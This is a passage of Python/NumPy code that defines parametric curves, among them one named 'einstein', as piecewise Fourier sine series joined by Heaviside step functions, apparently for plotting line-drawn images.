*t + 3/19) + 11/23 *np.sin(17 *t + 106/23) + 9/64 *np.sin(18 *t + 97/22) - 10004/35) *np.heaviside(27 *np.pi - t,0.5) *np.heaviside(t - 23 *np.pi,0.5) + (-18/13 *np.sin(7/50 - 18 *t) - 7/5 *np.sin(1/10 - 16 *t) - 51/25 *np.sin(18/19 - 12 *t) - 219/35 *np.sin(7/30 - 10 *t) - 158/43 *np.sin(40/37 - 6 *t) - 512/25 *np.sin(13/16 - 4 *t) - 289/29 *np.sin(68/67 - 2 *t) + 18315/101 *np.sin(t + 29/18) + 664/31 *np.sin(3 *t + 61/23) + 48/11 *np.sin(5 *t + 84/67) + 489/49 *np.sin(7 *t + 11/25) + 397/33 *np.sin(8 *t + 8/19) + 73/12 *np.sin(9 *t + 9/53) + 194/41 *np.sin(11 *t + 17/14) + 2/3 *np.sin(13 *t + 149/50) + 43/29 *np.sin(14 *t + 91/31) + 61/35 *np.sin(15 *t + 131/56) + 29/37 *np.sin(17 *t + 1/19) + 49/43 *np.sin(19 *t + 65/24) + 15/19 *np.sin(20 *t + 88/21) + 11/38 *np.sin(21 *t + 217/50) + 3917/10) *np.heaviside(23 *np.pi - t,0.5) *np.heaviside(t - 19 *np.pi,0.5) + (-8/9 *np.sin(12/23 - 16 *t) - 504/53 *np.sin(8/29 - 8 *t) - 635/43 *np.sin(32/37 - 4 *t) - 307/41 *np.sin(8/27 - 3 *t) - 20292/91 *np.sin(16/19 - t) + 483/19 *np.sin(2 *t + 41/13) + 108/23 *np.sin(5 *t + 70/29) + 74/35 *np.sin(6 *t + 145/34) + 287/43 *np.sin(7 *t + 69/16) + 254/39 *np.sin(9 *t + 5/27) + 19/4 *np.sin(10 *t + 37/30) + 129/46 *np.sin(11 *t + 75/32) + 24/19 *np.sin(12 *t + 71/46) + 125/52 *np.sin(13 *t + 87/44) + 46/27 *np.sin(14 *t + 40/31) + 26/29 *np.sin(15 *t + 106/27) + 25/63 *np.sin(17 *t + 53/12) + 23/22 *np.sin(18 *t + 9/29) + 3/35 *np.sin(19 *t + 205/103) + 200/201 *np.sin(20 *t + 22/25) + 8/31 *np.sin(21 *t + 77/25) - 15195/29) *np.heaviside(19 *np.pi - t,0.5) *np.heaviside(t - 15 *np.pi,0.5) + (-15/23 *np.sin(22/23 - 35 *t) - 21/26 *np.sin(13/40 - 30 *t) - 71/64 *np.sin(16/19 - 29 *t) - 97/29 *np.sin(15/41 - 23 *t) - 57/17 *np.sin(54/35 - 16 *t) - 79/25 *np.sin(41/39 - 14 *t) - 24/11 *np.sin(3/8 - 13 *t) - 149/17 *np.sin(21/62 - 6 *t) - 613/31 *np.sin(16/17 - 2 *t) + 6033/20 *np.sin(t + 24/17) + 631/16 *np.sin(3 *t + 127/30) + 463/31 *np.sin(4 *t + 71/28) + 94/23 *np.sin(5 *t + 98/25) + 45/11 *np.sin(7 *t + 31/10) + 39/23 *np.sin(8 *t + 163/39) + 23/22 *np.sin(9 *t + 42/17) + 167/44 *np.sin(10 *t + 232/231) + 233/49 *np.sin(11 *t + 29/45) + 194/129 *np.sin(12 *t + 3/5) + 166/37 *np.sin(15 *t + 83/29) + 123/35 *np.sin(17 *t + 136/35) + 47/26 *np.sin(18 *t + 64/25) + 72/35 *np.sin(19 *t + 41/14) + 56/31 *np.sin(20 *t + 48/35) + 63/25 *np.sin(21 *t + 2/5) + 100/37 *np.sin(22 *t + 13/15) + 4/3 *np.sin(24 *t + 59/19) + 17/25 *np.sin(25 *t + 15/38) + 51/19 *np.sin(26 *t + 68/19) + 11/27 *np.sin(27 *t + 228/91) + 19/14 *np.sin(28 *t + 31/9) + 4/13 *np.sin(31 *t + 14/55) + 31/37 *np.sin(32 *t + 2/31) + 150/151 *np.sin(33 *t + 58/21) + 41/32 *np.sin(34 *t + 26/11) + 4/3 *np.sin(36 *t + 25/18) - 6956/53) *np.heaviside(15 *np.pi - t,0.5) *np.heaviside(t - 11 *np.pi,0.5) + (4337/36 *np.sin(t + 45/29) + 265/18) *np.heaviside(11 *np.pi - t,0.5) *np.heaviside(t - 7 *np.pi,0.5) + (-23/21 *np.sin(31/61 - t) - 1152/11) *np.heaviside(7 *np.pi - t,0.5) *np.heaviside(t - 3 *np.pi,0.5) + (3314/27 *np.sin(t + 30/31) + 65/31 *np.sin(2 *t + 26/23) - 1467/5) *np.heaviside(3 *np.pi - t,0.5) *np.heaviside(t + np.pi,0.5)) *np.heaviside(np.sin(t/2),0.0)
Y = ((-9/23 *np.sin(38/25 - 6 *t) - 67/38 *np.sin(36/23 - 3 *t) + 31/30 *np.sin(t + 14/9) + 409/9 *np.sin(2 *t + 74/47) + 493/141 *np.sin(4 *t + 85/54) + 14/17 *np.sin(5 *t + 75/16) + 5/46 *np.sin(7 *t + 21/13) + 33/23 *np.sin(8 *t + 74/47) + 14536/41) *np.heaviside(71 *np.pi - t,0.5) *np.heaviside(t - 67 *np.pi,0.5) + (-89/29 *np.sin(59/38 - 17 *t) - 5/11 *np.sin(14/9 - 16 *t) - 99/40 *np.sin(58/37 - 15 *t) - 59/7 *np.sin(25/16 - 11 *t) - 2/35 *np.sin(8/41 - 10 *t) - 381/26 *np.sin(25/16 - 9 *t) - 67/21 *np.sin(17/11 - 8 *t) - 1706/37 *np.sin(36/23 - 5 *t) - 29/9 *np.sin(29/19 - 4 *t) - 851/29 *np.sin(58/37 - 3 *t) + 1991/30 *np.sin(t + 96/61) + 528/17 *np.sin(2 *t + 85/54) + 89/67 *np.sin(6 *t + 37/24) + 102/13 *np.sin(7 *t + 80/17) + 17/16 *np.sin(12 *t + 91/58) + 35/12 *np.sin(13 *t + 37/23) + 127/27 *np.sin(14 *t + 27/17) - 26576/29) *np.heaviside(67 *np.pi - t,0.5) *np.heaviside(t - 63 *np.pi,0.5) + (-29/14 *np.sin(47/33 - 16 *t) - 35/22 *np.sin(75/52 - 15 *t) - 236/63 *np.sin(16/11 - 14 *t) - 41/6 *np.sin(34/23 - 13 *t) - 236/29 *np.sin(46/31 - 12 *t) - 167/28 *np.sin(55/37 - 11 *t) - 259/33 *np.sin(76/51 - 10 *t) - 414/73 *np.sin(56/37 - 9 *t) - 121/28 *np.sin(17/11 - 7 *t) - 177/32 *np.sin(61/41 - 6 *t) - 1499/41 *np.sin(48/31 - 5 *t) - 647/23 *np.sin(25/16 - 3 *t) + 610/13 *np.sin(t + 30/19) + 1474/31 *np.sin(2 *t + 30/19) + 807/41 *np.sin(4 *t + 41/26) + 208/31 *np.sin(8 *t + 43/27) - 16147/17) *np.heaviside(63 *np.pi - t,0.5) *np.heaviside(t - 59 *np.pi,0.5) + (-12/41 *np.sin(1/4 - 28 *t) - 11/43 *np.sin(9/14 - 26 *t) - 17/41 *np.sin(14/13 - 24 *t) - 22/31 *np.sin(17/67 - 22 *t) - 7/10 *np.sin(64/63 - 19 *t) - 69/41 *np.sin(39/31 - 14 *t) - 86/25 *np.sin(22/41 - 12 *t) - 87/52 *np.sin(31/27 - 9 *t) - 23/15 *np.sin(13/33 - 7 *t) - 25/17 *np.sin(22/25 - 3 *t) + 159/28 *np.sin(t + 249/248) + 571/20 *np.sin(2 *t + 23/26) + 109/36 *np.sin(4 *t + 29/18) + 161/58 *np.sin(5 *t + 31/23) + 147/26 *np.sin(6 *t + 31/19) + 199/35 *np.sin(8 *t + 37/42) + 96/19 *np.sin(10 *t + 17/47) + 64/27 *np.sin(11 *t + 337/75) + 15/7 *np.sin(13 *t + 157/44) + np.sin(15 *t + 101/33) + 5/38 *np.sin(16 *t + 1/28) + 11/56 *np.sin(17 *t + 23/37) + 6/11 *np.sin(18 *t + 8/9) + 91/136 *np.sin(20 *t + 3/19) + 55/54 *np.sin(21 *t + 102/25) + 15/16 *np.sin(23 *t + 118/31) + 22/27 *np.sin(25 *t + 49/15) + 3/8 *np.sin(27 *t + 27/8) + 22/43 *np.sin(29 *t + 57/16) + 10/19 *np.sin(30 *t + 50/83) + 5/31 *np.sin(31 *t + 121/38) + 2727/23) *np.heaviside(59 *np.pi - t,0.5) *np.heaviside(t - 55 *np.pi,0.5) + (-41/31 *np.sin(23/21 - 4 *t) - 85/14 *np.sin(17/32 - t) + 407/35 *np.sin(2 *t + 75/22) + 21/10 *np.sin(3 *t + 41/14) + 53/54 *np.sin(5 *t + 54/25) + 31/61 *np.sin(6 *t + 124/27) + 5/36 *np.sin(7 *t + 3/19) + 19/31 *np.sin(8 *t + 144/31) + 10393/23) *np.heaviside(55 *np.pi - t,0.5) *np.heaviside(t - 51 *np.pi,0.5) + (-36/41 *np.sin(5/18 - 6 *t) + 83/35 *np.sin(t + 95/28) + 43/37 *np.sin(2 *t + 66/17) + 165/13 *np.sin(3 *t + 27/53) + 79/19 *np.sin(4 *t + 9/17) + 37/24 *np.sin(5 *t + 190/63) + 57/58 *np.sin(7 *t + 267/100) + 13545/31) *np.heaviside(51 *np.pi - t,0.5) *np.heaviside(t - 47 *np.pi,0.5) + (-123/47 *np.sin(19/15 - 18 *t) - 59/29 *np.sin(1/49 - 16 *t) - 213/37 *np.sin(29/22 - 13 *t) - 381/40 *np.sin(4/29 - 11 *t) - 168/29 *np.sin(6/11 - 10 *t) - 1233/44 *np.sin(3/19 - 3 *t) - 711/7 *np.sin(1/39 - 2 *t) - 5171/26 *np.sin(12/19 - t) + 2965/57 *np.sin(4 *t + 89/28) + 347/21 *np.sin(5 *t + 23/93) + 1087/69 *np.sin(6 *t + 4/31) + 760/37 *np.sin(7 *t + 172/53) + 333/19 *np.sin(8 *t + 7/13) + 325/81 *np.sin(9 *t + 96/55) + 53/17 *np.sin(12 *t + 138/49) + 73/40 *np.sin(14 *t + 92/67) + 47/31 *np.sin(15 *t + 81/19) + 7/11 *np.sin(17 *t + 29/30) - 3017/19) *np.heaviside(47 *np.pi - t,0.5) *np.heaviside(t - 43 *np.pi,0.5) + (-713/27 *np.sin(22/17 - t) - 36840/41) *np.heaviside(43 *np.pi - t,0.5) *np.heaviside(t - 39 *np.pi,0.5) + (-675/23 *np.sin(13/16 - t) - 17750/19) *np.heaviside(39 *np.pi - t,0.5) *np.heaviside(t - 35 *np.pi,0.5) + (-39/29 *np.sin(11/16 - 17 *t) - 102/37 *np.sin(8/49 - 11 *t) - 95/34 *np.sin(4/13 - 9 *t) - 71/22 *np.sin(7/12 - 8 *t) - 194/17 *np.sin(29/23 - 7 *t) - 2531/25 *np.sin(13/36 - t) + 601/19 *np.sin(2 *t + 264/61) + 232/5 *np.sin(3 *t + 53/13) + 309/40 *np.sin(4 *t + 29/10) + 266/39 *np.sin(5 *t + 3/16) + 71/95 *np.sin(6 *t + 50/37) + 281/44 *np.sin(10 *t + 33/43) + 29/15 *np.sin(12 *t + 105/29) + 39/25 *np.sin(13 *t + 109/36) + 24/11 *np.sin(14 *t + 51/38) + 19/9 *np.sin(15 *t + 38/23) + 43/29 *np.sin(16 *t + 4) + 53/74 *np.sin(18 *t + 74/25) - 45956/91) *np.heaviside(35 *np.pi - t,0.5) *np.heaviside(t - 31 *np.pi,0.5) + (-25/32 *np.sin(4/13 - 15 *t) - 40/43 *np.sin(11/19 - 13 *t) - 12727/115 *np.sin(83/84 - t) + 1762/31 *np.sin(2 *t + 66/29) + 905/78 *np.sin(3 *t + 46/25) + 209/25 *np.sin(4 *t + 104/37) + 103/27 *np.sin(5 *t + 32/17) + 121/60 *np.sin(6 *t + 143/37) + 29/7 *np.sin(7 *t + 45/13) + 41/36 *np.sin(8 *t + 271/58) + 125/62 *np.sin(9 *t + 152/33) + 118/79 *np.sin(10 *t + 56/25) + 41/24 *np.sin(11 *t + 108/25) + 22/45 *np.sin(12 *t + 116/41) + 43/35 *np.sin(14 *t + 68/19) + 1/15 *np.sin(16 *t + 26/11) + 13/43 *np.sin(17 *t + 53/25) - 29541/41) *np.heaviside(31 *np.pi - t,0.5) *np.heaviside(t - 27 *np.pi,0.5) + (-235/21 *np.sin(5/46 - 5 *t) - 133/13 *np.sin(3/29 - 4 *t) - 437/37 *np.sin(50/37 - 3 *t) - 2785/19 *np.sin(5/4 - t) + 724/17 *np.sin(2 *t + 68/29) + 211/141 *np.sin(6 *t + 83/44) + 41/14 *np.sin(7 *t + 135/32) + 83/20 *np.sin(8 *t + 135/38) + 123/62 *np.sin(9 *t + 136/33) + 304/203 *np.sin(10 *t + 166/47) + 59/44 *np.sin(11 *t + 5/29) + 25/36 *np.sin(12 *t + 102/49) + 13/12 *np.sin(13 *t + 101/41) + 23/13 *np.sin(14 *t + 73/26) + 5/32 *np.sin(15 *t + 85/27) + 41/61 *np.sin(16 *t + 56/25) + 1/7 *np.sin(17 *t + 10/17) + 7/18 *np.sin(18 *t + 134/51) - 8059/11) *np.heaviside(27 *np.pi - t,0.5) *np.heaviside(t - 23 *np.pi,0.5) + (-32/23 *np.sin(20/27 - 18 *t) - 31/20 *np.sin(19/17 - 17 *t) - 89/38 *np.sin(30/23 - 13 *t) - 529/122 *np.sin(22/15 - 10 *t) - 151/35 *np.sin(2/27 - 8 *t) - 417/28 *np.sin(43/29 - 4 *t) - 851/35 *np.sin(3/14 - 3 *t) - 13229/88 *np.sin(31/52 - t) + 425/12 *np.sin(2 *t + 37/18) + 397/30 *np.sin(5 *t + 37/17) + 299/31 *np.sin(6 *t + 122/41) + 301/38 *np.sin(7 *t + 58/35) + 240/43 *np.sin(9 *t + 118/27) + 39/28 *np.sin(11 *t + 27/34) + 82/165 *np.sin(12 *t + 58/27) + 29/26 *np.sin(14 *t + 77/27) + 47/19 *np.sin(15 *t + 7/4) + 46/17 *np.sin(16 *t + 79/22) + 46/35 *np.sin(19 *t + 43/21) + 23/28 *np.sin(20 *t + 105/31) + 27/23 *np.sin(21 *t + 184/41) - 12036/55) *np.heaviside(23 *np.pi - t,0.5) *np.heaviside(t - 19 *np.pi,0.5) + (-16/37 *np.sin(42/43 - 19 *t) - 21/23 *np.sin(37/26 - 18 *t) - 23/17 *np.sin(25/56 - 17 *t) - 46/61 *np.sin(34/45 - 16 *t) - 161/22 *np.sin(1/2 - 6 *t) - 472/43 *np.sin(15/23 - 5 *t) - 620/29 *np.sin(43/60 - 3 *t) + 2821/25 *np.sin(t + 167/39) + 2605/88 *np.sin(2 *t + 89/30) + 449/43 *np.sin(4 *t + 66/25) + 37/24 *np.sin(7 *t + 37/33) + 107/13 *np.sin(8 *t + 175/52) + 341/128 *np.sin(9 *t + 188/41) + 32/15 *np.sin(10 *t + 12/19) + 208/43 *np.sin(11 *t + 44/73) + 122/53 *np.sin(12 *t + 41/39) + 69/40 *np.sin(13 *t + 9/32) + 34/23 *np.sin(14 *t + 208/45) + 19/11 *np.sin(15 *t + 11/36) + 17/19 *np.sin(20 *t + 111/26) + 4/15 *np.sin(21 *t + 26/25) - 10055/37) *np.heaviside(19 *np.pi - t,0.5) *np.heaviside(t - 15 *np.pi,0.5) + (-59/44 *np.sin(173/172 - 36 *t) - 73/31 *np.sin(21/53 - 30 *t) - 23/11 *np.sin(13/12 - 29 *t) - 133/50 *np.sin(23/19 - 28 *t) - 125/29 *np.sin(108/77 - 24 *t) - 122/33 *np.sin(1/19 - 21 *t) - 238/79 *np.sin(4/7 - 16 *t) - 141/16 *np.sin(34/37 - 9 *t) - 45/8 *np.sin(16/27 - 7 *t) + 11594/23 *np.sin(t + 1768/589) + 1582/37 *np.sin(2 *t + 28/25) + 771/38 *np.sin(3 *t + 107/31) + 863/22 *np.sin(4 *t + 87/22) + 485/29 *np.sin(5 *t + 63/25) + 27/8 *np.sin(6 *t + 75/76) + 106/19 *np.sin(8 *t + 20/23) + 54/17 *np.sin(10 *t + 10/49) + 206/61 *np.sin(11 *t + 106/29) + 65/14 *np.sin(12 *t + 81/29) + 80/11 *np.sin(13 *t + 49/43) + 41/29 *np.sin(14 *t + 1/114) + 17/38 *np.sin(15 *t + 97/43) + 97/20 *np.sin(17 *t + 98/23) + 77/30 *np.sin(18 *t + 49/19) + 44/13 *np.sin(19 *t + 53/16) + 44/19 *np.sin(20 *t + 95/23) + 135/29 *np.sin(22 *t + 27/25) + 243/121 *np.sin(23 *t + 23/17) + 15/4 *np.sin(25 *t + 10/17) + 50/13 *np.sin(26 *t + 75/32) + 308/47 *np.sin(27 *t + 253/76) + 65/19 *np.sin(31 *t + 7/15) + 92/33 *np.sin(32 *t + 26/11) + 17/15 *np.sin(33 *t + 74/23) + 8/15 *np.sin(34 *t + 64/27) + 17/27 *np.sin(35 *t + 215/72) + 16757/30) *np.heaviside(15 *np.pi - t,0.5) *np.heaviside(t - 11 *np.pi,0.5) + (1805/16 *np.sin(t + 1/303) + 19936/43) *np.heaviside(11 *np.pi - t,0.5) *np.heaviside(t - 7 *np.pi,0.5) + (374/65 *np.sin(t + 149/47) + 11537/27) *np.heaviside(7 *np.pi - t,0.5) *np.heaviside(t - 3 *np.pi,0.5) + (-15391/135 *np.sin(35/71 - t) + 112/53 *np.sin(2 *t + 66/29) + 13507/30) *np.heaviside(3 *np.pi - t,0.5) *np.heaviside(t + np.pi,0.5)) *np.heaviside(np.sin(t/2),0.0)
elif curvename=='einstein':
X = ((-38/9 *np.sin(11/7 - 3 *t) + 156/5 *np.sin(t + 47/10) + 91/16 *np.sin(2 *t + 21/13) + 555/2) *theta(91 *np.pi - t) *theta(t - 87 *np.pi) + (-12/11 *np.sin(35/23 - 11 *t) + 4243/12 *np.sin(t + 11/7) + 678/11 *np.sin(2 *t + 33/7) + 401/6 *np.sin(3 *t + 47/10) + 59/3 *np.sin(4 *t + 11/7) + 238/25 *np.sin(5 *t + 47/10) + 85/11 *np.sin(6 *t + 51/11) + 57/4 *np.sin(7 *t + 61/13) + 28/29 *np.sin(8 *t + 22/5) + 52/9 *np.sin(9 *t + 14/3) + 286/57 *np.sin(10 *t + 11/7) + 19/11 *np.sin(12 *t + 32/7) + 30/11 *np.sin(13 *t + 60/13) + 95/14 *np.sin(14 *t + 89/19) + 32/7 *np.sin(15 *t + 11/7) + 43/10 *np.sin(16 *t + 65/14) + 19/7 *np.sin(17 *t + 32/7) + 13/10 *np.sin(18 *t + 77/17) + 11/9 *np.sin(19 *t + 85/19) + 1/5 *np.sin(20 *t + 4) + 3/11 *np.sin(21 *t + 28/9) + 29/11 *np.sin(22 *t + 60/13) + 80/27 *np.sin(23 *t + 50/11) + 19/12 *np.sin(24 *t + 60/13) + 1/5 *np.sin(25 *t + 12/5) + 82/13 *np.sin(26 *t + 51/11) + 3/11 *np.sin(27 *t + 19/8) + 32/9 *np.sin(28 *t + 10/7) + 41/7 *np.sin(29 *t + 22/15) + 9/11 *np.sin(30 *t + 11/8) + 2881/6) *theta(87 *np.pi - t) *theta(t - 83 *np.pi) + (-46/31 *np.sin(20/13 - 22 *t) - 22/9 *np.sin(14/9 - 6 *t) - 5/4 *np.sin(3/2 - 4 *t) + 399/5 *np.sin(t + 11/7) + 16/9 *np.sin(2 *t + 3/2) + 116/13 *np.sin(3 *t + 14/9) + 8/5 *np.sin(5 *t + 14/9) + 11/7 *np.sin(7 *t + 8/5) + 9/11 *np.sin(8 *t + 14/3) + 28/13 *np.sin(9 *t + 11/7) + 7/8 *np.sin(10 *t + 11/7) + 23/12 *np.sin(11 *t + 17/11) + 11/12 *np.sin(12 *t + 19/13) + 35/23 *np.sin(13 *t + 3/2) + 13/7 *np.sin(14 *t + 20/13) + 19/9 *np.sin(15 *t + 3/2) + 11/5 *np.sin(16 *t + 3/2) + 27/13 *np.sin(17 *t + 34/23) + 3 *np.sin(18 *t + 26/17) + 6/5 *np.sin(19 *t + 7/5) + 19/12 *np.sin(20 *t + 29/19) + 20/13 *np.sin(21 *t + 21/13) + 8/9 *np.sin(23 *t + 32/7) + 22/23 *np.sin(24 *t + 23/5) + 17/11 *np.sin(25 *t + 61/13) + 13021/30) *theta(83 *np.pi - t) *theta(t - 79 *np.pi) + (-15/31 *np.sin(11/7 - 8 *t) + 1/15 *np.sin(t + 11/6) + 55/14 *np.sin(2 *t + 19/12) + 88/13 *np.sin(3 *t + 19/12) + 17/9 *np.sin(4 *t + 8/5) + 1/18 *np.sin(5 *t + 16/9) + 4/7 *np.sin(6 *t + 21/13) + 9/8 *np.sin(7 *t + 8/5) + 8/15 *np.sin(9 *t + 8/5) + 3053/7) *theta(79 *np.pi - t) *theta(t - 75 *np.pi) + (-20/3 *np.sin(11/7 - 4 *t) - 117/8 *np.sin(11/7 - 3 *t) - 647/27 *np.sin(11/7 - 2 *t) + 559/15 *np.sin(t + 11/7) + 2/13 *np.sin(5 *t + 13/8) + 6/17 *np.sin(6 *t + 18/11) + 5/8 *np.sin(7 *t + 8/5) + 22549/41) *theta(75 *np.pi - t) *theta(t - 71 *np.pi) + (-11/9 *np.sin(17/11 - 10 *t) - 40/13 *np.sin(14/9 - 8 *t) - 254/23 *np.sin(11/7 - 4 *t) - 62/7 *np.sin(11/7 - 2 *t) + 11 *np.sin(t + 11/7) + 255/16 *np.sin(3 *t + 11/7) + 137/10 *np.sin(5 *t + 19/12) + 111/8 *np.sin(6 *t + 19/12) + 29/19 *np.sin(7 *t + 8/5) + 2/9 *np.sin(9 *t + 26/17) + 11/12 *np.sin(11 *t + 19/12) + 1/24 *np.sin(12 *t + 41/9) + 8/9 *np.sin(14 *t + 13/8) + 1313/3) *theta(71 *np.pi - t) *theta(t - 67 *np.pi) + (-5/8 *np.sin(14/9 - 8 *t) - 11/13 *np.sin(14/9 - 7 *t) - 12/5 *np.sin(11/7 - 6 *t) - 7/9 *np.sin(14/9 - 3 *t) - 272/13 *np.sin(11/7 - 2 *t) + 7/2 *np.sin(t + 11/7) + 3/4 *np.sin(4 *t + 14/9) + 7/9 *np.sin(5 *t + 11/7) + 3/13 *np.sin(9 *t + 11/7) + 4876/9) *theta(67 *np.pi - t) *theta(t - 63 *np.pi) + (-22/9 *np.sin(11/7 - t) + 177/7 *np.sin(2 *t + 11/7) + 21/10 *np.sin(3 *t + 11/7) + 11/7 *np.sin(4 *t + 11/7) + 1/14 *np.sin(5 *t + 17/10) + 66/19 *np.sin(6 *t + 11/7) + 1/22 *np.sin(7 *t + 12/7) + 20/13 *np.sin(8 *t + 11/7) + 3561/10) *theta(63 *np.pi - t) *theta(t - 59 *np.pi) + (-9/17 *np.sin(25/17 - 11 *t) - 1/2 *np.sin(25/17 - 10 *t) - 1/5 *np.sin(9/7 - 9 *t) - 1/3 *np.sin(4/3 - 8 *t) - 7/3 *np.sin(14/9 - 7 *t) - 208/25 *np.sin(14/9 - 4 *t) + 139/3 *np.sin(t + 11/7) + 186/5 *np.sin(2 *t + 11/7) + 19/6 *np.sin(3 *t + 8/5) + 19/12 *np.sin(5 *t + 8/5) + 3/13 *np.sin(6 *t + 7/4) + 2/5 *np.sin(12 *t + 13/8) + 1/9 *np.sin(13 *t + 65/14) + 6/13 *np.sin(14 *t + 18/11) + 1/8 *np.sin(15 *t + 5/3) + 1/8 *np.sin(16 *t + 7/4) + 1/18 *np.sin(17 *t + 24/11) + 1737/4) *theta(59 *np.pi - t) *theta(t - 55 *np.pi) + (-6/13 *np.sin(23/15 - 21 *t) - 3/10 *np.sin(10/7 - 20 *t) - 7/8 *np.sin(26/17 - 19 *t) - 1/4 *np.sin(19/13 - 18 *t) - 11/17 *np.sin(17/11 - 17 *t) - 1/8 *np.sin(11/9 - 16 *t) - 7/8 *np.sin(17/11 - 15 *t) - 38/39 *np.sin(11/7 - 13 *t) - 57/10 *np.sin(14/9 - 7 *t) - 1/7 *np.sin(3/5 - 6 *t) - 201/10 *np.sin(14/9 - 5 *t) - 28/11 *np.sin(17/11 - 4 *t) - 303/10 *np.sin(14/9 - 3 *t) + 1084/9 *np.sin(t + 11/7) + 39/7 *np.sin(2 *t + 14/9) + 23/14 *np.sin(8 *t + 14/9) + 22/23 *np.sin(9 *t + 47/10) + 8/13 *np.sin(10 *t + 11/7) + 1/8 *np.sin(11 *t + 22/13) + 10/19 *np.sin(12 *t + 11/7) + 9/13 *np.sin(14 *t + 21/13) + 1/8 *np.sin(22 *t + 11/7) + 1319/3) *theta(55 *np.pi - t) *theta(t - 51 *np.pi) + (-3/2 *np.sin(11/7 - 17 *t) - 9/8 *np.sin(14/9 - 15 *t) - 12/7 *np.sin(14/9 - 14 *t) - 8/7 *np.sin(14/9 - 12 *t) - 6/19 *np.sin(3/2 - 11 *t) - 296/11 *np.sin(11/7 - 5 *t) - 163/25 *np.sin(11/7 - 4 *t) - 721/20 *np.sin(11/7 - 3 *t) - 85/4 *np.sin(11/7 - 2 *t) + 1353/7 *np.sin(t + 11/7) + 31/11 *np.sin(6 *t + 8/5) + 113/10 *np.sin(7 *t + 33/7) + 27/7 *np.sin(8 *t + 14/9) + 23/8 *np.sin(9 *t + 33/7) + 7/6 *np.sin(10 *t + 13/8) + 5/12 *np.sin(13 *t + 37/8) + 2/3 *np.sin(16 *t + 51/11) + 3/8 *np.sin(18 *t + 8/5) + 7126/15) *theta(51 *np.pi - t) *theta(t - 47 *np.pi) + (-2/9 *np.sin(1/3 - 4 *t) + 791/5 *np.sin(t + 11/7) + 10/19 *np.sin(2 *t + 9/14) + 118/7 *np.sin(3 *t + 14/9) + 21/4 *np.sin(5 *t + 11/7) + 1/9 *np.sin(6 *t + 117/58) + 30/11 *np.sin(7 *t + 14/9) + 5/13 *np.sin(8 *t + 17/14) + 7/4 *np.sin(9 *t + 28/19) + 3/14 *np.sin(10 *t + 15/16) + 12/13 *np.sin(11 *t + 19/12) + 1/15 *np.sin(12 *t + 43/13) + 11/16 *np.sin(13 *t + 13/8) + 2251/5) *theta(47 *np.pi - t) *theta(t - 43 *np.pi) + (3724/25 *np.sin(t + 11/7) + 1/3 *np.sin(2 *t + 16/9) + 266/17 *np.sin(3 *t + 11/7) + 10/13 *np.sin(4 *t + 19/11) + 34/7 *np.sin(5 *t + 19/12) + 5/12 *np.sin(6 *t + 5/3) + 20/11 *np.sin(7 *t + 8/5) + 1/5 *np.sin(8 *t + 11/7) + 7/5 *np.sin(9 *t + 19/12) + 2/7 *np.sin(10 *t + 5/3) + 7/8 *np.sin(11 *t + 14/9) + 1/51 *np.sin(12 *t + 47/16) + 7/9 *np.sin(13 *t + 13/8) + 1/10 *np.sin(14 *t + 50/11) + 12403/28) *theta(43 *np.pi - t) *theta(t - 39 *np.pi) + (-4/7 *np.sin(5/9 - 19 *t) + 4341/11 *np.sin(t + 17/11) + 595/6 *np.sin(2 *t + 14/3) + 1286/17 *np.sin(3 *t + 37/8) + 314/9 *np.sin(4 *t + 23/15) + 121/3 *np.sin(5 *t + 37/8) + 222/17 *np.sin(6 *t + 21/5) + 103/9 *np.sin(7 *t + 23/5) + 29/5 *np.sin(8 *t + 25/6) + 127/9 *np.sin(9 *t + 49/11) + 11/6 *np.sin(10 *t + 37/19) + 23/3 *np.sin(11 *t + 23/5) + 77/13 *np.sin(12 *t + 23/12) + 97/7 *np.sin(13 *t + 41/9) + 29/7 *np.sin(14 *t + 17/8) + 39/7 *np.sin(15 *t + 49/11) + 5/8 *np.sin(16 *t + 19/11) + 5/11 *np.sin(17 *t + 17/9) + 2/3 *np.sin(18 *t + 27/7) + 19/13 *np.sin(20 *t + 37/12) + 84/13 *np.sin(21 *t + 25/6) + 11/23 *np.sin(22 *t + 41/14) + 45/13 *np.sin(23 *t + 31/32) + 3/14 *np.sin(24 *t + 41/20) + 49/13 *np.sin(25 *t + 41/10) + 16/11 *np.sin(26 *t + 17/11) + 12/7 *np.sin(27 *t + 22/5) + 37/13 *np.sin(28 *t + 48/13) + 4/3 *np.sin(29 *t + 3) + 31/11 *np.sin(30 *t + 3/10) + 79/15 *np.sin(31 *t + 10/11) + 10753/21) *theta(39 *np.pi - t) *theta(t - 35 *np.pi) + (-16/9 *np.sin(13/9 - 8 *t) - 108/19 *np.sin(8/11 - 6 *t) + 17/13 *np.sin(t + 8/7) + 7/3 *np.sin(2 *t + 21/10) + 24/7 *np.sin(3 *t + 20/9) + 26/7 *np.sin(4 *t + 32/7) + 26/11 *np.sin(5 *t + 11/4) + 105/19 *np.sin(7 *t + 30/7) + 6/7 *np.sin(9 *t + 5/11) + 23/15 *np.sin(10 *t + 7/5) + 11/6 *np.sin(11 *t + 11/3) + 12822/23) *theta(35 *np.pi - t) *theta(t - 31 *np.pi) + (-5/8 *np.sin(11/12 - 10 *t) - 64/13 *np.sin(13/14 - 6 *t) + 7/5 *np.sin(t + 45/11) + 74/21 *np.sin(2 *t + 1/7) + 52/15 *np.sin(3 *t + 39/10) + 5/8 *np.sin(4 *t + 3/5) + 17/11 *np.sin(5 *t + 7/6) + 39/8 *np.sin(7 *t + 51/13) + 15/8 *np.sin(8 *t + 29/8) + 16/9 *np.sin(9 *t + 14/3) + 97/48 *np.sin(11 *t + 5/9) + 3401/10) *theta(31 *np.pi - t) *theta(t - 27 *np.pi) + (-12/25 *np.sin(17/13 - 6 *t) - 7/11 *np.sin(4/7 - 4 *t) - 14/27 *np.sin(3/13 - 2 *t) + 351/10 *np.sin(t + 11/8) + 17/6 *np.sin(3 *t + 28/27) + 9/8 *np.sin(5 *t + 10/13) + 3921/7) *theta(27 *np.pi - t) *theta(t - 23 *np.pi) + (431/8 *np.sin(t + 4/5) + 199/25 *np.sin(2 *t + 40/9) + 2328/7) *theta(23 *np.pi - t) *theta(t - 19 *np.pi) + (-2/3 *np.sin(5/4 - 9 *t) - 11/9 *np.sin(4/3 - 5 *t) - 74/21 *np.sin(1/13 - 4 *t) + 107/6 *np.sin(t + 8/17) + 73/10 *np.sin(2 *t + 12/11) + 53/12 *np.sin(3 *t + 48/11) + 4/9 *np.sin(6 *t + 31/13) + 4/11 *np.sin(7 *t + 5/13) + 5/14 *np.sin(8 *t + 127/42) + 5/16 *np.sin(10 *t + 17/9) + 2/5 *np.sin(11 *t + 29/7) + 2378/13) *theta(19 *np.pi - t) 